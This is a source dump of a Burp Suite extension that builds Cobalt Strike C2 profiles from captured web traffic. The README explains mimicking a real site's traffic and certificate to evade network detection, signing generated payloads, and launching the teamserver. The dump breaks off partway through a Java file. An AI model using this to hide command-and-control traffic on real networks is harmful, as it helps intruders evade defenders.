├── .gitignore
├── README.md
├── imgs
│   ├── check_http.png
│   ├── http-get.jpg
│   ├── http-post.png
│   └── text-bing.png
├── pom.xml
├── src
│   └── main
│       ├── java
│       │   ├── burp
│       │   │   └── BurpExtender.java
│       │   └── com
│       │       └── test
│       │           └── burp
│       │               ├── Generator.java
│       │               ├── JustC2file.java
│       │               ├── dao
│       │               │   ├── DnsBeaconDao.java
│       │               │   ├── HttpGetBeaconDao.java
│       │               │   ├── HttpPostBeaconDao.java
│       │               │   ├── HttpStagerDao.java
│       │               │   ├── HttpsCertificateDao.java
│       │               │   ├── PersiancatDao.java
│       │               │   ├── PostExDao.java
│       │               │   └── impl
│       │               │       ├── AnalyzeInfo.java
│       │               │       ├── DnsBeaconDaoImpl.java
│       │               │       ├── HttpGetBeaconDaoImpl.java
│       │               │       ├── HttpPostBeaconDaoImpl.java
│       │               │       ├── HttpStagerDaoImpl.java
│       │               │       ├── HttpsCertificateDaoImpl.java
│       │               │       ├── LoadFile.java
│       │               │       ├── PersiancatDaoImpl.java
│       │               │       └── PostExDaoImpl.java
│       │               ├── model
│       │               │   ├── DnsBeacon.java
│       │               │   ├── HttpGetBeacon.java
│       │               │   ├── HttpPostBeacon.java
│       │               │   ├── HttpStager.java
│       │               │   ├── HttpsCertificate.java
│       │               │   ├── Persiancat.java
│       │               │   └── PostEx.java
│       │               ├── service
│       │               │   ├── DnsBeaconService.java
│       │               │   ├── HttpGetBeaconService.java
│       │               │   ├── HttpPostBeaconService.java
│       │               │   ├── HttpStagerService.java
│       │               │   ├── HttpsCertificateService.java
│       │               │   ├── PersiancatService.java
│       │               │   ├── PostExService.java
│       │               │   └── impl
│       │               │       ├── DnsBeaconServiceImpl.java
│       │               │       ├── HttpGetBeaconServiceImpl.java
│       │               │       ├── HttpPostBeaconServiceImpl.java
│       │               │       ├── HttpStagerServiceImpl.java
│       │               │       ├── HttpsCertificateServiceImpl.java
│       │               │       ├── PersiancatServiceImpl.java
│       │               │       └── PostExServiceImpl.java
│       │               ├── testcode
│       │               │   └── FreemarkerDemo.java
│       │               └── ui
│       │                   └── C2ui.java
│       └── resources
│           ├── templates
│           │   ├── c2profile_template.ftl
│           │   ├── c2profile_template4.2.ftl
│           │   └── c2profile_template4.4.ftl
│           └── wordlists
│               ├── dns_idle
│               ├── dns_stager_prepend
│               ├── dns_stager_subhost
│               ├── parameters
│               ├── pipename
│               ├── spawnto
│               ├── stager_uri
│               └── useragents
└── test.profile

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
.idea/
.DS_Store/
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# JustC2file: Burp plugin -- C2 profile generator
## Description

Select requests in the Burp proxy and generate a Cobalt Strike profile file from them.

## Usage

After installing the plugin in Burp, select at least three GET/POST requests to the target site at once; both GET and POST requests must be present. A profile file is generated from the request and response packets of those requests. Copy the text to the Cobalt Strike server and check it with c2lint; once it passes, the file can be used to start CS so that the traffic evades traffic detection. Test that commands execute before using it in a real environment.

![](https://github.com/Peithon/JustC2file/blob/master/imgs/text-bing.png)

## Demo

### 1. Generate traffic in a browser incognito window

Open an incognito window in the browser (so that no personal information is included), enable the proxy, and generate traffic in incognito mode. Chrome does not enable extensions in incognito mode by default; if they are not enabled, click the menu icon (three dots) in the top-right corner, choose More tools -> Extensions -> Details, and turn them on.

### 2. Select the relevant traffic in Burp

Back in Burp, right-click the traffic you want to use and highlight it; once enough traffic has been found, select it all at once and right-click to generate the CS configuration file.

![](https://github.com/Peithon/JustC2file/blob/master/imgs/check_http.png)

### 3. Modify the configuration file

***Modify https-certificate***

Instead of the default parameter values, the certificate can be generated from the target site's certificate information, which makes it more credible.

```
# default configuration; validity is the certificate's validity period
https-certificate {

    set C "SI";
    set CN "www.bing.com";
    set O "bing.com";
    set OU "bing.com";
    set validity "365";
}
```

***Modify code-signer***

If file signing is needed, change these to your certificate name and password and uncomment the block.

```
#code-signer{
#    set keystore "keystore.jks";
#    set password "123456";
#    set alias "google";
#}
```
### 4. Start CS on the server with the generated file

Test the file with c2lint on the server; once there are no errors, start CS with the command

```
nohup ./teamserver [external IP] [password] [/path/to/my.profile] &
```

Generate an executable and run it on the target; if executed commands return output, the configuration file works. Below is `Cobalt Strike` traffic captured in `Wireshark` ([sample profile](https://github.com/Peithon/JustC2file/blob/master/test.profile)); the images were compressed and are somewhat blurry:

![](https://github.com/Peithon/JustC2file/blob/master/imgs/http-get.jpg)

![](https://github.com/Peithon/JustC2file/blob/master/imgs/http-post.png)

## Things to note before starting CS
### About https-certificate

Instead of the default parameter values, the certificate can be generated from the target site's certificate information, which makes it more credible.

```
# default configuration; validity is the certificate's validity period
https-certificate {

    set C "SI";
    set CN "www.bing.com";
    set O "bing.com";
    set OU "bing.com";
    set validity "365";
}
```

View the target site's certificate information in the browser, then fill it into the corresponding https-certificate parameters.


### About code-signer

Executables or DLLs generated via `Attacks -> Packages -> Windows Executable` and `Windows Executable (S)` are not signed by default. To sign an executable or DLL, generate a `jks` keystore on the CS server and configure code-signer in the profile file, as follows:

***The C2 profile and the keystore should preferably be in the same directory***

1. Generate your own free certificate with `keytool`

Note: remember the values given after `-alias` and `-keystore`; they are used later in the `C2-profile` file.
```
keytool -genkey -alias google -keyalg RSA -validity 36500 -keystore keystore.store
```
2. Convert the store keystore to `.p12` format

The original `keystore.store` is renamed to `keystore.store.old` here
```
keytool -importkeystore -srckeystore keystore.store -destkeystore keystore.store -deststoretype pkcs12
```
3. Convert the `.p12` keystore to `.jks` format
```
keytool -v -importkeystore -srckeystore keystore.store -srcstoretype PKCS12 -destkeystore keystore.jks -deststoretype JKS
```
4. Configure it in the C2 file

```
# change to your keystore name and password, and uncomment
#code-signer{
#    set keystore "keystore.jks";
#    set password "123456";
#    set alias "google";
#}
```
## Changelog
- 2022-01-15 Addendum to the first official release
  - Added support for CS 4.4

- 2022-01-14 First official release
  - Refactored the beta code
  - Rebuilt the code using the MVC pattern
  - Supports CS 4.2
  - Supports deriving `http-stager` from traffic
  - `prepend` and `append` are now generated automatically from traffic
  - Supports random generation of the `post-ex` block
  - Added a `process-inject` definition

- 2021-12-28 First beta: `http-get` and `http-post` are generated from the selected traffic; everything else is generated randomly.

## References

[CS official documentation](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2_main.htm?cshid=1062)

[Randomized Malleable C2 Profiles Made Easy](https://bluescreenofjeff.com/2017-08-30-randomized-malleable-c2-profiles-made-easy/)

[How to Write Malleable C2 Profiles for Cobalt Strike](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)

[threatexpress/malleable-c2](https://github.com/threatexpress/malleable-c2)


--------------------------------------------------------------------------------
/imgs/check_http.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Peithon/JustC2file/7b14ee267808f60739cbc377354645a9aa378f18/imgs/check_http.png
--------------------------------------------------------------------------------
/imgs/http-get.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Peithon/JustC2file/7b14ee267808f60739cbc377354645a9aa378f18/imgs/http-get.jpg
--------------------------------------------------------------------------------
/imgs/http-post.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Peithon/JustC2file/7b14ee267808f60739cbc377354645a9aa378f18/imgs/http-post.png
--------------------------------------------------------------------------------
/imgs/text-bing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Peithon/JustC2file/7b14ee267808f60739cbc377354645a9aa378f18/imgs/text-bing.png
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.test.burp</groupId>
    <artifactId>JustC2file</artifactId>
    <version>1.0</version>
    <packaging>jar</packaging>

    <dependencies>
        <dependency>
            <groupId>net.portswigger.burp.extender</groupId>
            <artifactId>burp-extender-api</artifactId>
            <version>2.1</version>
        </dependency>

        <dependency>
            <groupId>org.freemarker</groupId>
            <artifactId>freemarker</artifactId>
            <version>2.3.20</version>
        </dependency>

        <dependency>
            <groupId>commons-io</groupId>
            <artifactId>commons-io</artifactId>
            <version>2.11.0</version>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-install-plugin</artifactId>
                <version>2.4</version>
            </plugin>

            <plugin>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.7.0</version>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                </configuration>
            </plugin>
        </plugins>
    </build>
</project>
--------------------------------------------------------------------------------
/src/main/java/burp/BurpExtender.java:
--------------------------------------------------------------------------------
package burp;

import com.test.burp.JustC2file;

public class BurpExtender extends JustC2file {
    //@author: peithon
    public static void main(String[] args) {
        //File->Project Structure->Artifacts->Add->Jar->From modules with dependencies
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/Generator.java:
--------------------------------------------------------------------------------
package com.test.burp;

import burp.*;
import com.test.burp.dao.impl.AnalyzeInfo;
import com.test.burp.service.*;
import com.test.burp.service.impl.*;
import freemarker.template.Configuration;
import freemarker.template.Template;

import java.io.PrintWriter;
import java.io.StringWriter;
import java.util.*;

/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class Generator {
    private PersiancatService persiancatService = new PersiancatServiceImpl();
    private HttpsCertificateService httpsCertificateService = new HttpsCertificateServiceImpl();
    private PostExService postExService = new PostExServiceImpl();
    private HttpStagerService httpStagerService = new HttpStagerServiceImpl();
    private HttpGetBeaconService httpGetBeaconService = new HttpGetBeaconServiceImpl();
    private HttpPostBeaconService httpPostBeaconService = new HttpPostBeaconServiceImpl();
    private DnsBeaconService dnsBeaconService = new DnsBeaconServiceImpl();
    private AnalyzeInfo analyzeInfo = new AnalyzeInfo();
    private IContextMenuInvocation invocation;
    private IExtensionHelpers helpers;
    private IBurpExtenderCallbacks callbacks;
    private String example;

    public Generator(IContextMenuInvocation invocation, IBurpExtenderCallbacks callbacks) {
        this.invocation = invocation;
        this.helpers = callbacks.getHelpers();
        this.callbacks = callbacks;
    }

    public String getProfile(String TEMPLATE_VERSION) {
        Map<String, String> dataMap = new HashMap<>();
        // getSelectedMessages() returns the HTTP request/response details currently displayed or selected by the user
        // analyzeRequest() parses the HTTP request so that the values of several fields can be read
        dataMap.putAll(persiancatService.putdataPersiancat());
        dataMap.putAll(postExService.putdataPostEx());
        dataMap.putAll(httpsCertificateService.putdataHttpsCertificate());
        IHttpRequestResponse[] messages = invocation.getSelectedMessages();
        IHttpRequestResponse stagermessages = getHttpStager(messages);
        httpStagerService.dataHttpStager(callbacks, stagermessages);
        PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true);
        for (IHttpRequestResponse message : messages) {
            stderr.println("IHttpRequestResponse message: " + message);
            IRequestInfo analyzedRequest = helpers.analyzeRequest(message.getRequest());
            // the message chosen as http-stager is not reused for http-get/http-post
            if (!message.equals(stagermessages)) {
                if (analyzedRequest.getMethod().equals("POST")) {
                    httpPostBeaconService.dataHttpPostBeacon(callbacks, message);
                } else if (analyzedRequest.getMethod().equals("GET")) {
                    httpGetBeaconService.dataHttpGetBeacon(callbacks, message);
                }
            }
        }
        stderr.println("[end-message] ------------------------------------------------------------------------");
        dataMap.putAll(httpStagerService.putdataHttpStager());
        dataMap.putAll(httpGetBeaconService.putdataHttpGetBeacon());
        dataMap.putAll(httpPostBeaconService.putdataHttpPostBeacon());
        dataMap.putAll(dnsBeaconService.putdataDnsBeacon());
        if (TEMPLATE_VERSION.equals("CobaltStrike_4_4")) {
            return getExampleFile(dataMap, "c2profile_template4.4.ftl");
        }
        return getExampleFile(dataMap, "c2profile_template4.2.ftl");
    }

    public String getExampleFile(Map<String, String> dataMap, String TEMPLATE_FILENAME) {
        try {
            // step1: create the FreeMarker configuration instance
            Configuration cfg = new Configuration();
            // step2: set the template path
            cfg.setClassForTemplateLoading(this.getClass(), "/templates");
            // step3: create the data model
            //Map dataMap = new HashMap();
            // step4: load the template file
            Template template = cfg.getTemplate(TEMPLATE_FILENAME);
            // step5: render the data
            StringWriter strWriter = new StringWriter();
            template.process(dataMap, strWriter);
            example = strWriter.toString();
        } catch (Exception e) {
            e.printStackTrace();
        }
        return example;
    }

    public IHttpRequestResponse getHttpStager(IHttpRequestResponse[] messages) {
        List<IHttpRequestResponse> getlist = new ArrayList<>();
        List<IHttpRequestResponse> postlist = new ArrayList<>();
        IHttpRequestResponse returnIHttp = null;
        for (IHttpRequestResponse message : messages) {
            IRequestInfo analyzedRequest = helpers.analyzeRequest(message.getRequest());
            if (analyzedRequest.getMethod().equals("POST")) {
                postlist.add(message);
            } else if (analyzedRequest.getMethod().equals("GET")) {
                getlist.add(message);
            }
        }
        // nothing to choose from when no GET or POST messages were selected
        if (getlist.isEmpty() && postlist.isEmpty()) {
            return null;
        }
        // prefer the larger group, and within it the first message that has a response body
        if (getlist.size() >= postlist.size()) {
            for (IHttpRequestResponse iHttpRequestResponse : getlist) {
                if (analyzeInfo.isExistResponseBody(callbacks, iHttpRequestResponse)) {
                    returnIHttp = iHttpRequestResponse;
                    break;
                }
            }
            if (returnIHttp == null) {
                returnIHttp = getlist.get(new Random().nextInt(getlist.size()));
            }
        } else {
            for (IHttpRequestResponse iHttpRequestResponse : postlist) {
                if (analyzeInfo.isExistResponseBody(callbacks, iHttpRequestResponse)) {
                    returnIHttp = iHttpRequestResponse;
                    break;
                }
            }
            if (returnIHttp == null) {
                returnIHttp = postlist.get(new Random().nextInt(postlist.size()));
            }
        }
        return returnIHttp;
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/JustC2file.java:
--------------------------------------------------------------------------------
package com.test.burp;

import burp.*;
import com.test.burp.ui.C2ui;

import javax.swing.*;
import java.io.PrintWriter;
import java.util.ArrayList;
import java.util.List;
/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class JustC2file implements IBurpExtender, IContextMenuFactory
{
    private static final String name = "JustC2file";
    private IBurpExtenderCallbacks callbacks;

    @Override
    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
    {
        PrintWriter stdout = new PrintWriter(callbacks.getStdout(), true);
        PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true);
        this.callbacks = callbacks;
        callbacks.setExtensionName(name);
        stdout.println("[INFO] ------------------------------------------------------------------------\n" +
                "[INFO] C2 profile generator\n" +
                "[INFO] ------------------------------------------------------------------------\n" +
                "[INFO] 用法: 同时选中至少三个请求(GET/POST),且必须GET和POST同时存在,然后右键点击该插件。\n" +
                "[INFO] 提示: 想要隐蔽性好的话,Get请求可以选择JQuery;\n" +
                "[INFO] ------------------------------------------------------------------------\n");
        stderr.println("no errors");
        callbacks.registerContextMenuFactory(this);

    }
    // Custom context menu
    @Override
    public List<JMenuItem> createMenuItems(final IContextMenuInvocation invocation) {
        List<JMenuItem> listMenuItems = new ArrayList<>();
        // sub-menu items
        JMenuItem menuItem42 = new JMenuItem("CobaltStrike 4.2");
        JMenuItem menuItem44 = new JMenuItem("CobaltStrike 4.4");
        // parent menu
        JMenu jMenu = new JMenu("Generate C2 profile");
        jMenu.add(menuItem42);
        jMenu.add(menuItem44);
        listMenuItems.add(jMenu);
        menuItem42.addActionListener(e -> {
            // GUI window showing the generated C2 profile
            C2ui frame = new C2ui();
            frame.setLocationRelativeTo(null);
            frame.setVisible(true);
            frame.setFile(new Generator(invocation, this.callbacks).getProfile("CobaltStrike_4_2"));
        });

        menuItem44.addActionListener(e -> {
            // GUI window showing the generated C2 profile
            C2ui frame = new C2ui();
            frame.setLocationRelativeTo(null);
            frame.setVisible(true);
            frame.setFile(new Generator(invocation, this.callbacks).getProfile("CobaltStrike_4_4"));
        });

        return listMenuItems;
    }


}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/DnsBeaconDao.java:
--------------------------------------------------------------------------------
package com.test.burp.dao;

import com.test.burp.model.DnsBeacon;

import java.util.Map;

public interface DnsBeaconDao {
    DnsBeacon dataDnsBeacon();
    Map<String, String> putdataDnsBeacon();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/HttpGetBeaconDao.java:
--------------------------------------------------------------------------------
package com.test.burp.dao;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.model.HttpGetBeacon;

import java.util.Map;
/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public interface HttpGetBeaconDao {
    HttpGetBeacon dataHttpGetBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message);
    Map<String, String> putdataHttpGetBeacon();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/HttpPostBeaconDao.java:
--------------------------------------------------------------------------------
package com.test.burp.dao;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.model.HttpPostBeacon;

import java.util.Map;

public interface HttpPostBeaconDao {
    HttpPostBeacon dataHttpPostBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message);
    Map<String, String> putdataHttpPostBeacon();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/HttpStagerDao.java:
--------------------------------------------------------------------------------
package com.test.burp.dao;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import com.test.burp.model.HttpStager;

import java.util.Map;

public interface HttpStagerDao {
    HttpStager dataHttpStager(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message);
    Map<String, String> putdataHttpStager();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/HttpsCertificateDao.java:
--------------------------------------------------------------------------------
package com.test.burp.dao;

import com.test.burp.model.HttpsCertificate;

import java.util.Map;
/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public interface HttpsCertificateDao {
    HttpsCertificate dataHttpsCertificate();
    Map<String, String> putdataHttpsCertificate();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/PersiancatDao.java:
--------------------------------------------------------------------------------
package com.test.burp.dao;

import com.test.burp.model.Persiancat;

import java.util.Map;
/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public interface PersiancatDao {
    Persiancat dataPersiancat();
    Map<String, String> putdataPersiancat();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/PostExDao.java:
--------------------------------------------------------------------------------
package com.test.burp.dao;

import com.test.burp.model.PostEx;

import java.util.Map;
/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public interface PostExDao {
    PostEx dataPostEx();
    Map<String, String> putdataPostEx();
}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/impl/AnalyzeInfo.java:
--------------------------------------------------------------------------------
package com.test.burp.dao.impl;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import burp.IResponseInfo;

import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Collectors;

import static java.util.Arrays.asList;
/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class AnalyzeInfo {
    // Header prefixes that are not copied into the profile:
    //  - the GET/POST request line, the HTTP response line, User-Agent, Cookie, Set-Cookie and Host are dropped;
    //  - Content-Type, Server and Accept-Encoding already exist in the template;
    //  - Date and Content-Length are not configured here but added in http-config;
    //  - Accept-Language is dropped: it carries a comma-separated list of languages, the first being preferred
    //    and the others carrying a "q" value (0~1) expressing preference, e.g. zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7;
    //    add it yourself if needed, or a later code update may substitute it;
    //  - sec-*/Sec-* client hints and DNT are dropped, e.g.
    //      sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
    //      DNT: 1
    //      sec-ch-ua-mobile: ?0
    //      Sec-Fetch-Site: same-site
    //      Sec-Fetch-Mode: cors
    //      Sec-Fetch-Dest: empty
    private static final List<String> SKIPPED_PREFIXES = asList(
            "GET", "POST", "HTTP", "User-Agent", "Cookie", "Set-Cookie", "Content-Type", "Server",
            "Date", "Content-Length", "Accept-Encoding", "Host", "Accept-Language", "sec-", "Sec-", "DNT:");

    // Process the GET/POST request/response headers into name -> value pairs
    public Map<String, String> lookHeaders(List<String> headers) {
        Map<String, String> dataMap = new HashMap<>();
        for (String header : headers) {
            if (SKIPPED_PREFIXES.stream().anyMatch(header::startsWith)) {
                continue;
            }
            // split "Name: value" on ": "; the first part is the name, the remaining parts are joined as the value
            List<String> lists = Arrays.asList(header.split("[:]\\s+"));
            StringBuilder line = new StringBuilder();
            String key = "";
            for (int i = 0; i < lists.size(); i++) {
                if (i == 0) {
                    key = lists.get(0);
                } else {
                    line.append(lists.get(i));
                }
            }
            if (!(key.equals("") && line.toString().equals(""))) {
                // escape double quotes so the value can sit inside a quoted profile string
                dataMap.put(key, line.toString().trim().replaceAll("\"", "\\\\\""));
            }
        }
        return dataMap;
    }

    // Pick the encoding type
    public String getEncode() {
        List<String> encode = asList(
                "netbiosu;",
                "base64;",
                "base64url;",
                "mask;",
                "netbios;"
        );
        return encode.get(new Random().nextInt(encode.size()));
    }

    // Format headers: pick up to four header names and render them as profile "header" lines
    public List<String> formatHeaders(Map<String, String> map) {
        List<String> listall = new ArrayList<>(map.keySet());
        List<String> list = new ArrayList<>();
        if (listall.size() > 3) {
            for (int j = 0; j < listall.size() / 3 + 1; j++) {
                list.add(listall.get(new Random().nextInt(listall.size())));
            }
            list = list.stream().distinct().collect(Collectors.toList());
        } else {
            list.addAll(listall);
        }
        List<String> line = new ArrayList<>();
        for (int i = 0; i < 4; i++) {
            line.add(i, "");
        }
        for (int i = 0; i < list.size(); i++) {
            if (i == 4) {
                break;
            }
            line.set(i, "header \"" + list.get(i) + "\" \"" + map.get(list.get(i)) + "\";");
        }
        return line;
    }
    // Format the URI: keep at most six path segments
    public String formatUri(String uri) {
        List<String> list = asList(uri.split("/"));
        StringBuilder uriStr = new StringBuilder();
        if (list.size() <= 7) {
            uriStr = new StringBuilder(uri);
        } else {
            for (int i = 1; i < 7; i++) {
                uriStr.append("/").append(list.get(i));
            }
        }
        return uriStr.toString();
    }

    // Format the body
    public String formatHtml(String body) {
        body = body.replaceAll("", "");
        body = decodeUnicode(body);
        // replace CJK characters with a plain ASCII placeholder
        body = body.replaceAll("[\u4e00-\u9fa5]", "docs");
        //str = str.replaceAll("/[*](.|[\r\n])*?[*]/","");
        body = body.replaceAll("\t|\r|\n", "");
        // str = str.replaceAll("\\\\","\\\\\\\\");
        return body;
    }
    public String lookHost(List<String> headers) {
        String host = "";
        for (String header : headers) {
            if (header.startsWith("Host")) {
                host = header.split("[:]\\s+")[1].trim();
            }
        }
        return host;
    }

    public String lookServer(List<String> headers) {
        String server = "Apache";
        for (String header : headers) {
            if (header.startsWith("Server:")) {
                server = header.split("[:]\\s+")[1].trim();
            }
        }
        return server;
    }

    public String lookContentType(List<String> headers) {
        String contentType = "text/plain;charset=UTF-8";
        for (String header : headers) {
            if (header.startsWith("Content-Type")) {
                contentType = header.split("[:]\\s+")[1].trim();
            }
        }
        return contentType;
    }

    // Check whether the response has a body
    public Boolean isExistResponseBody(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) {
        byte[] response = message.getResponse();
        // history items without a recorded response have nothing to analyze
        if (response == null) {
            return false;
        }
        IResponseInfo analyzeResponse = callbacks.getHelpers().analyzeResponse(response);
        // Responses have no notion of parameters; most of what needs changing is in the body
        String resp = new String(response);
        int bodyOffset = analyzeResponse.getBodyOffset();
        // MIME type of the response as stated in the HTTP headers:
        //String sss = analyzeResponse.getStatedMimeType();
        // MIME type of the response inferred from the body content:
        //String ssst = analyzeResponse.getInferredMimeType();
        String body = resp.substring(bodyOffset);
        // return false if the body is empty
        return !body.equals("");
    }

    // Handle double quotes in the response body and return three parts for the caller
    public List<String> analyzeBody(String body) {
        body = formatHtml(body);
        List<String> list = new ArrayList<>();
        if (body.length() < 4211) {
            list.add(moBody(body.substring(0, body.length() / 3)));
            list.add(moBody(body.substring(body.length() / 3, body.length() / 3 * 2)));
            list.add(moBody(body.substring(body.length() / 3 * 2, body.length())));
        } else {
            int length1 = new Random().nextInt(600) + 1506;
            int length2 = body.length() - length1;
            int len = (length1 + length2) / 2 + new Random().nextInt(335) + 577;
            list.add(moBody(body.substring(0, length1)));
            list.add(moBody(body.substring((length1 + length2) / 2, len)));
            list.add(moBody(body.substring(length2, body.length())));
        }
        return list;
    }

    // Escape special characters
    public String moBody(String body) {
        body = body.replaceAll("\\\\", "\\\\\\\\");
        body = body.replaceAll("\"", "\\\\\"");
        return body;
    }

    // Convert \uXXXX escapes in the page to the characters they denote
    public String decodeUnicode(String str) {
        Pattern p = Pattern.compile("\\\\u([0-9a-fA-F]{4})");
        Matcher m = p.matcher(str);
        StringBuilder sb = new StringBuilder();
        int start = 0;
        while (m.find(start)) {
            // copy the text before the escape, then the decoded character
            sb.append(str, start, m.start());
            sb.append((char) Integer.parseInt(m.group(1), 16));
            start = m.end();
        }
        sb.append(str.substring(start));
        return sb.toString();
    }

}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/impl/DnsBeaconDaoImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.dao.impl;

import com.test.burp.dao.DnsBeaconDao;
import com.test.burp.model.DnsBeacon;

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import java.util.Random;

/**
 * @program: JustC2file
 * @author: Peithon
 * @github: https://github.com/Peithon/JustC2file
 * @create: 2022-01-13 16:03
 **/
public class DnsBeaconDaoImpl implements DnsBeaconDao {
    private DnsBeacon dnsBeacon = new DnsBeacon();
    private LoadFile file = new LoadFile();
    Map<String, String> dataMap = new HashMap<>();
    @Override
    public DnsBeacon dataDnsBeacon() {
        dnsBeacon.setMaxdns(lookMaxdns());
        dnsBeacon.setDns_max_txt(lookDns_max_txt());
        dnsBeacon.setDns_sleep(lookDns_sleep());
        try {
            dnsBeacon.setDns_idle(file.readLine("dns_idle"));
            dnsBeacon.setDns_stager_prepend(file.readLine("dns_stager_prepend"));
            dnsBeacon.setDns_stager_subhost(file.readLine("dns_stager_subhost"));
        } catch (IOException e) {
            e.printStackTrace();
        }
        return dnsBeacon;
    }

    @Override
    public Map<String, String> putdataDnsBeacon() {
        dataMap.put("maxdns", dnsBeacon.getMaxdns());
        dataMap.put("dns_max_txt", dnsBeacon.getDns_max_txt());
        dataMap.put("dns_idle", dnsBeacon.getDns_idle());
        dataMap.put("dns_sleep", dnsBeacon.getDns_sleep());
        dataMap.put("dns_stager_prepend", dnsBeacon.getDns_stager_prepend());
        dataMap.put("dns_stager_subhost", dnsBeacon.getDns_stager_subhost());
        return dataMap;
    }

    public String lookMaxdns() {
        /*
        maxdns sets the maximum hostname length Cobalt Strike uses when uploading data; the default is 255.
        This may be flagged by some security devices. The lower this setting, the more DNS traffic may be generated.
        Either way the target will see an overall spike in DNS traffic, but it is important to keep this in mind
        when changing the setting to a lower value.
        */
        return String.valueOf(new Random().nextInt(6) + 249);
    }

    public String lookDns_max_txt() {
        return "248";
    }

    public String lookDns_sleep() {
        return "0";
    }

}
--------------------------------------------------------------------------------
/src/main/java/com/test/burp/dao/impl/HttpGetBeaconDaoImpl.java:
--------------------------------------------------------------------------------
package com.test.burp.dao.impl;

import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import burp.IRequestInfo;
import burp.IResponseInfo;
import com.test.burp.dao.HttpGetBeaconDao;
import com.test.burp.model.HttpGetBeacon;

import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
 * @program: JustC2file
 * @author: Peithon
 * @create: 2022-01-08 09:09
 **/
public class HttpGetBeaconDaoImpl implements HttpGetBeaconDao {
    private HttpGetBeacon httpGetBeacon = new HttpGetBeacon();
    private Map<String, String> dataMap = new HashMap<>();
    private AnalyzeInfo analyzeInfo = new AnalyzeInfo();
    @Override
    public HttpGetBeacon dataHttpGetBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) {
        byte[] req = message.getRequest();
        IRequestInfo analyzedRequest = callbacks.getHelpers().analyzeRequest(req);
        List<String> headers = analyzedRequest.getHeaders();
        httpGetBeacon.setUri(analyzeInfo.formatUri(lookUri(headers)));
        httpGetBeacon.setHost(analyzeInfo.lookHost(headers));
        List<String> listhead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(headers));
        httpGetBeacon.setGet_client_header1(listhead.get(0));
        httpGetBeacon.setGet_client_header2(listhead.get(1));
        httpGetBeacon.setGet_client_header3(listhead.get(2));
        httpGetBeacon.setGet_client_header4(listhead.get(3));
        // httpGetBeacon.setGet_metadata_encode(analyzeInfo.getEncode());
        IResponseInfo analyzeResponse = callbacks.getHelpers().analyzeResponse(message.getResponse());
        List<String> iheaders = analyzeResponse.getHeaders();
        List<String> listihead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(iheaders));
        httpGetBeacon.setGet_server_header1(listihead.get(0));
        httpGetBeacon.setGet_server_header2(listihead.get(1));
        httpGetBeacon.setGet_server_header3(listihead.get(2));
        httpGetBeacon.setGet_server_header4(listihead.get(3));
        //httpGetBeacon.setGet_server_header(analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(iheaders)));
        httpGetBeacon.setGet_server_contentType(analyzeInfo.lookContentType(iheaders));
        httpGetBeacon.setGet_server_server(analyzeInfo.lookServer(iheaders));
